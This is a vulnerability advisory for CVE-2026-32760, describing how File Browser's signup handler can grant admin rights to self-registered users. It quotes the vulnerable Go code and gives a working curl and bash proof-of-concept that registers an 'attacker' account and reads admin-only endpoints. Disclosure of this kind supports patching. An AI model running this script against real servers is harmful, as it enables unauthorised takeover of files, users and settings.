CVE-2026-32760

Description

## Summary Any unauthenticated visitor can register a full administrator account when self-registration (`signup = true`) is enabled and the default user permissions have `perm.admin = true`. The signup handler blindly applies all default settings - including `Perm.Admin` - to the new user without any server-side guard that strips admin from self-registered accounts. ## Details **Affected file:** `http/auth.go` **Vulnerable code:** ```go // signupHandler (http/auth.go) user := &users.User{ Username: info.Username, } d.settings.Defaults.Apply(user) // ← copies Perm.Admin = true if set in defaults // NO guard: user.Perm.Admin is never cleared here ``` **`settings.UserDefaults.Apply` (settings/defaults.go):** ```go func (d *UserDefaults) Apply(u *users.User) { u.Perm = d.Perm // copies full Permissions struct, including Admin field ... } ``` **Settings API permits Admin in defaults (http/settings.go):** ```go var settingsPutHandler = withAdmin(func(_ http.ResponseWriter, r *http.Request, d *data) (int, error) { ... d.settings.Defaults = req.Defaults // Admin can set Defaults.Perm.Admin = true ... }) ``` The `signupHandler` is supposed to create unprivileged accounts for new visitors. It contains no explicit `user.Perm.Admin = false` reset after `Defaults.Apply`. If an administrator (intentionally or accidentally) configures `defaults.perm.admin = true` and also enables signup, every account created via the public registration endpoint is an administrator with full control over all files, users, and server settings. ## Demo Server Setup ```bash # Pull latest release docker run -d --name fb-test \ -p 8080:80 \ -v /tmp/fb-data:/srv \ filebrowser/filebrowser:v2.31.2 # Wait for startup, then set defaults.perm.admin = true ADMIN_TOKEN=$(curl -s -X POST http://localhost:8080/api/login \ -H 'Content-Type: application/json' \ -d '{"username":"admin","password":"admin"}') # Enable signup and set admin as default permission curl -s -X PUT http://localhost:8080/api/settings \ -H "X-Auth: $ADMIN_TOKEN" \ -H 'Content-Type: application/json' \ -d '{ "signup": true, "defaults": { "perm": { "admin": true, "execute": true, "create": true, "rename": true, "modify": true, "delete": true, "share": true, "download": true } } }' ``` ## PoC Exploit ```bash #!/bin/bash # poc_signup_admin.sh # Demonstrates: unauthenticated signup → admin account TARGET="http://localhost:8080" echo "[*] Registering attacker account via public signup endpoint..." STATUS=$(curl -s -o /dev/null -w "%{http_code}" \ -X POST "$TARGET/api/signup" \ -H "Content-Type: application/json" \ -d '{"username":"attacker","password":"Attack3r!pass"}') echo "[*] Signup response: HTTP $STATUS" echo "[*] Logging in as newly created account..." ATTACKER_TOKEN=$(curl -s -X POST "$TARGET/api/login" \ -H "Content-Type: application/json" \ -d '{"username":"attacker","password":"Attack3r!pass"}') echo "[*] Fetching user list with attacker token (admin-only endpoint)..." curl -s "$TARGET/api/users" \ -H "X-Auth: $ATTACKER_TOKEN" | python3 -m json.tool echo "" echo "[*] Verifying admin access by reading /api/settings..." curl -s "$TARGET/api/settings" \ -H "X-Auth: $ATTACKER_TOKEN" | python3 -m json.tool ``` **Expected output:** The attacker's token successfully returns the full user list and server settings - endpoints restricted to `Perm.Admin = true` users. ## Impact Any unauthenticated visitor who can reach `POST /api/signup` obtains a full admin account. From there, they can: - List, read, modify, and delete every file on the server - Create, modify, and delete all other users - Change authentication method and server settings - Execute arbitrary commands if `enableExec = true`

Priority Score